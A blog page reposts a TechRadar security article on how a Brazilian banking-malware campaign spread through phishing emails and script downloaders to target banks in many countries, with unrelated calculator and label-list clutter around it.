SIP CALCULATOR

Money Per month(₹)
500
Interest Rate(%)
1
Year(s)
1
1,20,000
Invested
1,20,000
Returns
1,20,000
Total

Created By: PATHAN MUKHTAR KHAN

How a piece of Brazilian malware became a global cybercrime export

via TechRadar - All the latest technology news http://bit.ly/2HBchKc Brazil holds a special place in popular consciousness. It evokes thoug...


via TechRadar - All the latest technology news http://bit.ly/2HBchKc

Brazil holds a special place in popular consciousness. It evokes thoughts of sun kissed beaches and dense, luscious jungle as well as extreme violence and poverty. Very few people outside of the industry however would associate it with a distinctly more modern phenomenon; Cybercrime.  

Brazil has been a major player in the global cybercrime landscape for over a decade now. Brazilian threat actors have been cited by a number of high profile reports as engaging in a plethora of cybercriminal activity, with threat actors taking aim mostly at high-yield targets in the financial industry. According to the Igarapé Institute, a Brazilian think-tank which engages with security and development issues, the country is ranked second worldwide in online banking fraud and financial malware. Brazilian hacker’s pedigree is known to be utilising huge swathes of botnets, which send out phishing emails, spam emails and proliferate Info-stealers and banking trojans.  

But even for Brazil’s own exceptionally high cybercrime standards, what Cybereason uncovered during 2018 proved exceptional. Researching, monitoring and analysing Brazilian financial malware, we discovered that this piece of malware had legs; It had managed to spread across almost a dozen countries in South America, Portugal and Spain, targeting customers of more than 60 banks around the globe.  

So how did Brazilian cybercriminals take this malware and unleash it on victims across the world? As with so many cybercrime campaigns, it started with a phish…

Infection

Cybereason found unaspiringly that phishing emails were used for the initial infection. The email body usually contains either an attachment or a link to a URL shortener that points to hosting websites where the first stage payload is stored. The payloads involved often masquerade as Flash/Java updates.  

Using a tactic which is popular in social engineering campaigns globally, the emails pertain to be invoices (“FATURA” in Portuguese) in order to dupe victims into clicking and investigating further. Another common theme is spoofing emails to make them look like they came from VIVO, Brazil’s largest telecommunications company. These two hooks allow for cybercriminals to target a significant number of potential victims with minimal effort, under the assumption invoices and emails from VIVO are sent and received every day, so will not constitute anything out of the ordinary.  

Once PDF documents within these phishing emails are opened, they will lead to a stream containing a shortened URL, which works to deflect any antivirus detections. The URL then resolves to a DropBox, or other online storage service, URL which contains a Zip, hosting the first stage downloader script or other online storage services. Another method led victims to a file sharing website and were then encouraged to download a ZIP file. Once users click on the file, it spawns cmd.exe and powershell.exe processes, which download a secondary payload. Additionally, an Internet Explorer instance launches and loads a legitimate Adobe website, probably to allay any suspicions that the users have about the downloaded file and to distract them from what’s going on in the background.

Theft

In 70 percent of the infections, the infection chain traces back to three main file extensions: .bat, .cmd and .lnk. The scripts are usually contained in an archive (.rar/.zip) to bypass email and spam filters. In addition to the batch files, Cybereason’s researchers also observed other extensions, such as .exe (Windows Executable) and .chm (compiled HTML), sent over as email attachments. Once installed and past the antivirus gatekeepers, the malware will begin to steal online banking data from the targeted banks, a list of which is embedded into the configuration of the malware. Although the malware was Brazilian in its origins, some samples were written to target banks in Spanish speaking countries across Europe and Latin America, including Chile, Bolivia, Argentina and Spain. 

This combination of downloaders bundled in archives proved to be one of the biggest strengths of the campaign, as they proved incredibly adept at bypassing antivirus software. Many of the analysed payloads correspondingly had a low detection rate, ranging between 0-17, out of 59 antivirus vendors. 

The Bigger Picture

Other Brazilian malware that was related to the malware analysed by Cybereason was also found on the compromised machines. These post-infection payloads provide a glimpse into the Brazilian malware ecosystem and, to some extent, offer an understanding of what the threat actors are after. 

In addition to the banking Trojans targeting bank users, we found that the same campaigns were distributing cryptocurrency miners, infostealers and malware that targets Microsoft Outlook. Malware that targets Outlook is a serious concern since it poses a major risk to organizations worldwide. The malware contains features that leverage Outlook’s functions, like the ability to query victims’ contact lists. Threat actors usually use this information for spam campaigns but can also sell it on the dark market to other attackers who want information on an organization they’re planning to attack. 

Assaf Dahan, Senior Director and Head of Threat Hunting at Cybereason

COMMENTS

Name

1988 Atlantic hurricane season,1,2017–18 Bergen County eruv controversy,1,All things,1,Amazon,89,Amazon.com: Best Sellers,14,Amazon.com: Best Sellers in Beauty & Personal Care,14,Amazon.com: Best Sellers in Clothing,61,Analisi Fondamentale,15,Analisi tecnica,40,Andrea Doria-class battleship,1,apple,51,Apple Newsroom,51,article of the day,198,Automated analytical tool for your forex trading account,2939,Banded stilt,1,Battle of Verrières Ridge,1,bbc news,5128,BBC News - World,5128,beauty,14,Beta-Hydroxy beta-methylbutyric acid,1,bitcoin,1,Britomart Redeems Faire Amoret,1,Buckton Castle,1,BUISNESS,2646,business,653,C. R. M. F. Cruttwell,1,Calendar Events,418,car insurance,1,Cloud (video game),1,Cooperative pulling paradigm,1,DailyFX - Feeds all,422,DailyFX - Forex Market News,205,DailyFX - Market News,3371,digital marketing,2,Dilophosaurus,1,Discovery Education,197,Education,408,education Learning In Wonderland,25,Education Week: English Language Learners,18,Emily Davison,1,Equestrian statue of Edward Horner,1,ESPN,48,Euryoryzomys emmonsae,1,Fantasy Book,1,fashion,30,Ford Piquette Avenue Plant,1,forex,2,Forex Calendar,3357,Forex Market,1858,Forex news,34,FOX NEWS,246,Fundamental Analysis,15,FX Analyst Articles,2140,Gadgets360 RSS Feeds : RSS Feed - NDTV Gadgets360.com,4411,Grand Duchess Anastasia Nikolaevna of Russia,1,Happy Chandler,1,Harry R. Truman,1,Health,70,Hilary of Chichester,1,Hogwarts Express (Universal Orlando Resort),1,Hurricane Daniel (2006),1,Ice drilling,1,IFTTT,509,internet marketing,1,Interstate 80 in Iowa,1,King Island emu,1,latest news,7786,Law,1,law.,1,M-35 (Michigan highway),1,market,623,Megalodon,1,Meteorological history of Hurricane Gordon,1,Moneycontrol Technology News,491,Monroe Doctrine Centennial half dollar,1,Monroe Edwards,1,More Hall Annex,1,Nat Geo Education Blog,67,National Geographic Education Blog,100,Nelson Mandela,1,Neville Chamberlain,1,news,8432,Nigel Williams (conservator),1,Nike-X,1,Norma (constellation),1,Norodom Ranariddh,1,Notizie Forex,22,Notizie Valute,12,NYT,1084,Ontario Highway 61,1,Percy Grainger,1,Peter Jeffrey (RAAF officer),1,Pioneer Helmet,1,Ramesses VI,1,reviews TechRadar - Technology Reviews,2,Russulaceae,1,Science-Fiction Plus,1,SEO,1,Shoes & Jewelry,61,Shorwell helmet,1,Simone Russell,1,Small-toothed sportive lemur,1,Snoring rail,1,Social forex community,2939,Social media marketing,1,Somerset Levels,1,South Carolina-class battleship,1,SPORT,61,Stefan Lochner,1,stock,1,Suillus spraguei,1,Teach123,6,tech,3833,tech reviews,3456,TECH TechRadar - All the latest technology news,23,Technical analysis,40,Technical Analysis DailyFX - pages/rss.rss-list.technical-analysis,526,Technical Analysis DailyFX - Technical Analysis,89,technology,198,techology,379,TechRadar - All the latest technology news,6005,TechRadar - Technology Reviews,1085,the new york times,2658,The Portage to San Cristobal of A.H.,1,Trade,8,video,1,vr,1,Wally Hammond,1,Waterloo Medal (Pistrucci),1,weight loss,2,Westminster Assembly,1,wikipedia,198,X-10 Graphite Reactor,1,
ltr
item
TECHNICAL MUKHTAR: How a piece of Brazilian malware became a global cybercrime export
How a piece of Brazilian malware became a global cybercrime export
http://cdn.mos.cms.futurecdn.net/Ramk8kAMZnG58FVJidCvuF.jpg
TECHNICAL MUKHTAR
https://technicalmukhtar.blogspot.com/2019/01/how-piece-of-brazilian-malware-became.html
https://technicalmukhtar.blogspot.com/
https://technicalmukhtar.blogspot.com/
https://technicalmukhtar.blogspot.com/2019/01/how-piece-of-brazilian-malware-became.html
true
709309995759877420
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share. STEP 2: Click the link you shared to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy